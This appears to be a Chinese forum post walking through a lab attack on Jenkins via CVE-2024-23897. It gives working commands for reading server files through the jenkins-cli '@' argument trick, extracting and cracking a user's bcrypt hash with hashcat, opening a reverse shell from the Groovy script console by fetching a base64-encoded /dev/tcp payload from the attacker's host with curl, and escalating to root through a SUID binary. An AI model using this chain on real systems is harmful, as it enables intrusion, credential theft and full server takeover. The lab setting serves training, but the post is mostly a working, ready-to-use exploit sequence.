Jenkins 恣意文件读取(CVE-2024-23897)+配景用户密码提取哈希破解+反弹Shel ...

打印 上一主题 下一主题

主题 681|帖子 681|积分 2043

一、前言

本文将深入研究一项涉及Jenkins的安全漏洞(CVE-2024–23897),将在实验室中先容这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞使用中,更显得尤为关键。
本文还涉及Jenkins凭证管理,针对Jenkins部署,引导到场者如何查找存储的用户和密码信息。更加刺激的是,我们将引导到场者使用Hashcat破解这些凭据,进一步揭露其中的安全挑战。
实验的一大亮点是反向Shell测试,要求学员使用Jenkins内置的Groovy脚本控制台创建反向Shell。通过一个非常范例的试错过程,到场者将切身体验实现远程命令执行的刺激和挑战。
最后,我们将探讨权限升级,一旦shell访问得到掩护,到场者将辨认并使用设置了SUID位的二进制文件举行权限升级。
二、 Jenkins (CVE-2024–23897) 靶机主题

此次靶场攻击主题内容:


  • 相识 CI / CD:到场者将从底子知识开始,相识 Jenkins 是什么及其通过持续集成/持续部署 (CI/CD)(Security+
    认证的根本概念)实现软件开发主动化方面的作用。 文件形貌符:实验室先容了文件形貌符,重点关注 STDOUT 和
    STDERR,教到场者如何操作这些流。这些知识对于有效管理渗透测试期间的输出至关重要。
  • 输出克制和重定向:以文件形貌符为底子,到场者将训练根据所涉及的文件形貌符克制和重定向输出,这是任何有理想的渗透测试职员工具包中的一项重要技能。
  • Jenkins 凭证:该运动针对 Jenkins 部署,引导到场者如何查找存储的用户和密码信息。 使用 Hashcat
    破解密码:到场者提取凭据并使用 Hashcat 破解它们。
  • 反向Shell测试:本实验的一大亮点,本部分要求学员使用Jenkins内置的Groovy脚本控制台创建反向Shell,通过一个非常范例的试错过程来实现远程命令执行。
  • 权限升级:一旦 shell 访问得到掩护,到场者将辨认并使用设置了 SUID 位的二进制文件来举行权限升级,相识 SUID
    位的重要性及其在类 Unix 操作系统中的作用。
三、靶机配置

下载靶机:
https://drive.google.com/file/d/1YD7fyJIjPCV3FtUfnK7UbxlMnUdrvA6X/view
下载后给靶机生成一个MAC地址:
  1. 00:50:56:3D:BD:9B
复制代码

配置之后开机,你是没有密码举行登陆的所以这个不理它

我们给靶机生成过了MAC,这个须要举行定义MAC,必须也要在一个局域网里!要否则找不到
  1. sudo arp-scan --localnet | grep 00:50:56
复制代码

  1. ┌──(kali㉿kali)-[~]
  2. └─$ nmap -Pn -sC -sV 192.168.207.132
  3. Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-04 11:15 CST
  4. Nmap scan report for 192.168.207.132
  5. Host is up (0.00082s latency).
  6. Not shown: 999 closed tcp ports (conn-refused)
  7. PORT     STATE SERVICE VERSION
  8. 8080/tcp open  http    Jetty 10.0.18
  9. | http-open-proxy: Potentially OPEN proxy.
  10. |_Methods supported:CONNECTION
  11. | http-robots.txt: 1 disallowed entry
  12. |_/
  13. |_http-server-header: Jetty(10.0.18)
  14. |_http-title: Dashboard [Jenkins]
  15. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  16. Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds
复制代码

我们须要从靶机系统下载一个Jenkins客户端,这个客户端后面用于使用,先创建一个文件夹

然后执行wget把jenkins-cli.jar提取到文件内里,如果出现错误多实验频频,把它提取出来!
  1. ┌──(kali㉿kali)-[~/jenkins-exploit]
  2. └─$ wget http://192.168.207.132:8080/jnlpJars/jenkins-cli.jar
  3. --2024-03-04 11:36:00--  http://192.168.207.132:8080/jnlpJars/jenkins-cli.jar
  4. 正在连接 192.168.207.132:8080... 已连接。
  5. 已发出 HTTP 请求,正在等待回应... 200 OK
  6. 长度:3623400 (3.5M) [application/java-archive]
  7. 正在保存至: “jenkins-cli.jar”
  8. jenkins-cli.jar                 100%[====================================================>]   3.46M  --.-KB/s  用时 0.05s   
  9. 2024-03-04 11:36:00 (67.7 MB/s) - 已保存 “jenkins-cli.jar” [3623400/3623400])
复制代码

四、本地文件读取漏洞

使用CLI命令测试查询在服务器上是否启用了匿名读取权限,留意IP地址须要换成你自己的!
  1. java -jar jenkins-cli.jar -s http://192.168.207.132:8080 help
  2. '@/etc/pass
复制代码

通过Jenkins客户端的help情势成功向我们展示了/etc/passwd/文件的第一行。
值得我们留意的是。此漏洞的一个关键方面是,差别的命令可以读取文件中差别数量的行数,在help情况下只返回一行。
获取可用命令的完备列表:
  1. java -jar jenkins-cli.jar -s http://192.168.207.132:8080 help
复制代码

在本实验的下一部分中,我们将编写一个脚本来测试这些命令中的每一个,以查看可以读取/etc/passwd中的行数。本节是shell脚本编写中一个风趣的实用训练。起首,只需将 help 命令的输出重定向到名为 output.txt 的文件即可。
  1. java -jar jenkins-cli.jar -s http://192.168.207.132:8080 help
  2. > output.txt
复制代码

  1. ┌──(root㉿kali)-[/home/kali/jenkins-exploit]
  2. └─# ls                              
  3. jenkins-cli.jar  output.txt
  4.                                                                                                                        
  5. ┌──(root㉿kali)-[/home/kali/jenkins-exploit]
  6. └─# cat output.txt                  
  7.                                              
复制代码
output.txt 是一个空的文件夹

这是因为此处的 help 命令的输出是打印到 STDERR 而不是 STDOUT。
在 Linux 系统上:


  • STDOUT与文件形貌符1相关联
  • STDERR与文件形貌符2相关联
当我们使用>字符将输出重定向到文件时,默认情况下它会将打印的信息重定向到STDOUT或文件形貌符1。


  • 帮助输出将改为发送到STDERR,我们可以将STDERR(文件形貌符2)输出重定到这样的文件。
  1. java -jar jenkins-cli.jar -s http://192.168.207.132:8080 help
  2. 2> output.txt
复制代码

TXT文本包罗了当前的两条信息


  • 我们可以运行的命令
  • 此命令的说明
所以下面要编写一个脚本来罗列每个可用命令来测试它将从/etc/passwd文件返回的行数,我们须要执行以下操作


  • 删除包罗说明的每一行
  • 保留包罗我们要测试的现实命令的每一行
如果打开output.txt 你会发现每个命令从行首开始2个空格,而形貌始终从行首开发4个空格。
创建一个output2.txt的文本,直接将下面的命令给丢进去
  1. add-job-to-view
  2. build
  3. cancel-quiet-down
  4. clear-queue
  5. connect-node
  6. console
  7. copy-job
  8. create-credentials-by-xml
  9. create-credentials-domain-by-xml
  10. create-job
  11. create-node
  12. create-view
  13. declarative-linter
  14. delete-builds
  15. delete-credentials
  16. delete-credentials-domain
  17. delete-job
  18. delete-node
  19. delete-view
  20. disable-job
  21. disable-plugin
  22. disconnect-node
  23. enable-job
  24. enable-plugin
  25. get-credentials-as-xml
  26. get-credentials-domain-as-xml
  27. get-gradle
  28. get-job
  29. get-node
  30. get-view
  31. groovy
  32. groovysh
  33. help
  34. import-credentials-as-xml
  35. install-plugin
  36. keep-build
  37. list-changes
  38. list-credentials
  39. list-credentials-as-xml
  40. list-credentials-context-resolvers
  41. list-credentials-providers
  42. list-jobs
  43. list-plugins
  44. mail
  45. offline-node
  46. online-node
  47. quiet-down
  48. reload-configuration
  49. reload-job
  50. remove-job-from-view
  51. replay-pipeline
  52. restart
  53. restart-from-stage
  54. safe-restart
  55. safe-shutdown
  56. session-id
  57. set-build-description
  58. set-build-display-name
  59. shutdown
  60. stop-builds
  61. update-credentials-by-xml
  62. update-credentials-domain-by-xml
  63. update-job
  64. update-node
  65. update-view
  66. version
  67. wait-node-offline
  68. wait-node-online
  69. who-am-i
复制代码
下面创建一个Bash 脚本,用于生成一个名为 enum.sh 的脚本文件。该脚本的作用是循环读取 output2.txt 文件中的每一行(假设这些行是 Jenkins CLI 命令),然后为每个命令生成一个输出。
让我们来解释这个命令的各个部分:

  • cat output2.txt: 读取 output2.txt 文件的内容。
  • while read cmd; do: 使用 while 循环逐行读取 output2.txt 中的内容,并将每一行赋值给变量 cmd。
  • echo "echo -n \"$cmd: \"; java -jar jenkins-cli.jar -s http://192.168.207.132:8080 $cmd @'/etc/passwd' 2>&1 | wc -l": 为每个命令生成一个字符串,其中包罗了用于执行 Jenkins CLI 命令的语法。这个字符串包罗了命令自己以及将输出重定向到 /etc/passwd 文件,并通过 wc -l 命令统计行数。
  • done: 结束循环。
  • > enum.sh: 将循环生成的字符串输出到名为 enum.sh 的文件中,覆盖现有的文件内容(如果文件已存在)。
所以,enum.sh 文件中的内容将包罗一系列的命令,每个命令都以其原始命令为前缀,并在其后执行 Jenkins CLI 命令,并输出到 /etc/passwd 文件。
  1. cat output2.txt | while read cmd; do echo "echo -n "$cmd: "; java -jar jenkins-cli.jar -s http://192.168.207.132:8080 $cmd @'/etc/passwd' 2>&1 | wc -l"; done > enum.sh
复制代码
  1. cat enum.sh
复制代码
创建完enum.sh看看内里有没有内容,IP是不是准确的,以防后面出题目,运行脚本前给个权限。
  1. chmod 777 enum.sh
  2. ./enum.sh
复制代码

脚本似乎按预期运行了。它执行了每个 Jenkins CLI 命令,并将输出重定向到 /etc/passwd 文件,然后通过 wc -l 统计了输出的行数。
每一行的格式是 <命令>: <行数>。行数表现执行该 Jenkins CLI 命令后输出的行数。
请留意,对于一些敏感的操作,比方 delete-job、delete-node、delete-view、offline-node 和 online-node,输出行数较多。这是因为这些操作大概会对 Jenkins 环境产生重大影响,输出包罗了相关的信息。
  1. java -jar jenkins-cli.jar -s http://192.168.207.132:8080 connect-node '@/etc/passwd'
复制代码

五 、罗列Jenkins用户、提取密码哈希值(破解)

Jenkins 安装将有一个文件,其中列出了此处的所有有效用户。


  • /var/jenkins_home/users/users.xml
使用 connect-node 命令读取此文件,如下所示
  1. java -jar jenkins-cli.jar -s http://192.168.207.132:8080 connect-node '@/var/jenkins_home/users/users.xml'
复制代码

users.xml显示系统上的单个用户,kyle_reese,其文件夹为 /var/jenkins_home/users/kylereese_12022439290147957862
在 Jenkins 上的每个用户文件夹中,始终有一个包罗用户密码哈希的config.xml文件。读取文件夹中的config.xml kylereese_12022439290147957862:
  1. java -jar jenkins-cli.jar -s http://192.168.207.132:8080 connect-node '@/var/jenkins_home/users/kylereese_12022439290147957862/config.xml'
复制代码

复制找到的密码哈希并将其粘贴到 Kali 上名为 hashes.txt 的文件中。
  1. pico hashes.txt
复制代码
然后把哈希写进去
  1. $2a$10$GqneLZhOq6hRpCXeXF07tuAN..Q8GKDv5zad/HfcpNpL8GJUNNdDO
复制代码
1.按下 Ctrl + O:这将会触发保存文件的操作。
2.按下 Enter:确认文件名。
3.按下 Ctrl + X:这将会退出 pico 编辑器。

接下来,我们将执行以下操作来破解此哈希值并确定现实密码是什么:

  • cp /usr/share/wordlists/rockyou.txt.gz:复制(cp)RockYou密码字典的压缩文件 rockyou.txt.gz 到当前目次(大概须要指定的目标目次)。
  • gunzip rockyou.txt.gz:解压缩 rockyou.txt.gz 文件,将其还原为 rockyou.txt 文件。这一步是因为 RockYou 字典通常以 gzip 压缩的情势提供,所以须要使用 gunzip 命令举行解压缩。
  • hashcat hashes.txt rockyou.txt:使用 Hashcat 工具,对名为 hashes.txt 的哈希文件举行破解,使用 rockyou.txt 字典举行密码破解攻击。这假设 hashes.txt 包罗已经获取的密码哈希,而 rockyou.txt 包罗大概的密码列表。
  1. cp /usr/share/wordlists/rockyou.txt.gz .
  2. gunzip rockyou.txt.gz
  3. hashcat hashes.txt rockyou.txt
复制代码
留意看截图的第一条命令,复制命令还有一个符号,没有的话会提示缺少目标文件,下面使用3200模式来破解

  1. hashcat -m 3200 hashes.txt rockyou.txt
复制代码
过程须要等候,因为是虚拟机给配置不高,所以等它跑完


获得密码后,您将能够使用以下命令登录 Jenkins Web 界面:


  • 账号:kyle_reese
  • 密码:mastermind
六、配景命令执行 反弹Shell




Jenkins 脚本控制台在官方用户手册中可以看到可以举行命令执行

  1. println "cat /etc/passwd".execute().text
复制代码

(1)反弹shell



  • 将反向 shell 代码放入脚本文件中。
  • 强制 Jenkins 服务器使用 curl 之类的东西下载这个脚本
  • 强制 Jenkins 服务器在本地执行
    从这里直接生成Shell https://www.revshells.com/访问不了可以访问这个https://www.ddosi.org/shell/

  1. echo -n '/bin/sh -i >& /dev/tcp/192.168.207.128/9001 0>&1' | base64 -d | /bin/bash
  2. base一下
  3. echo -n 'L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNy4xMjgvOTAwMSAwPiYx' | base64 -d | /bin/bash
复制代码
在 Kali 上创建一个名为 exploit.sh 的文件,并将 base64 编码的反向 shell 代码复制到其中。
  1. pico exploit.sh
复制代码
1.按下 Ctrl + O:这将会触发保存文件的操作。
2.按下 Enter:确认文件名。
3.按下 Ctrl + X:这将会退出 pico 编辑器。

然后在目次下起个python服务

使用 curl 命令将此文件提取到 Jenkins 服务器 /tmp 目次。
  1. println "curl http://192.168.207.128:8000/exploit.sh -o /tmp/exploit.sh".execute().text
复制代码

您应该在python服务中的日记输出中看到 Web 服务器收到了状态代码为 200 的点击。
然后给Shell权限,确保文件在目标服务器上可执行:
  1. println "chmod 777 /tmp/exploit.sh".execute().text
复制代码

Kali NC开起来

直接运行Shell,NC传回反应
  1. println "/bin/bash /tmp/exploit.sh".execute().text
复制代码

但是无权限读取文件,那么就须要举行权限提升!

(2)权限提升

  1. find / -perm -4000
复制代码

  1. find / -perm -4000
  2. 2>/dev/null
复制代码

  1. ssh-agent /bin/bash -p
复制代码

七、结束语

在本文中,我们深入探讨了Jenkins的一个安全漏洞(CVE-2024–23897),通过现实的实验室操作,带你一步步相识渗透测试的关键技能和步骤。从文件形貌符和输出管理到Jenkins凭证的发掘,再到密码破解和反向Shell创建,最后到权限提升,每个环节都涉及了渗透测试中的重要方面。目前此文还有更多的技能面和难题是不容易摸清的,我还是须要有空的时候重温一下。

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

正序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

杀鸡焉用牛刀

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表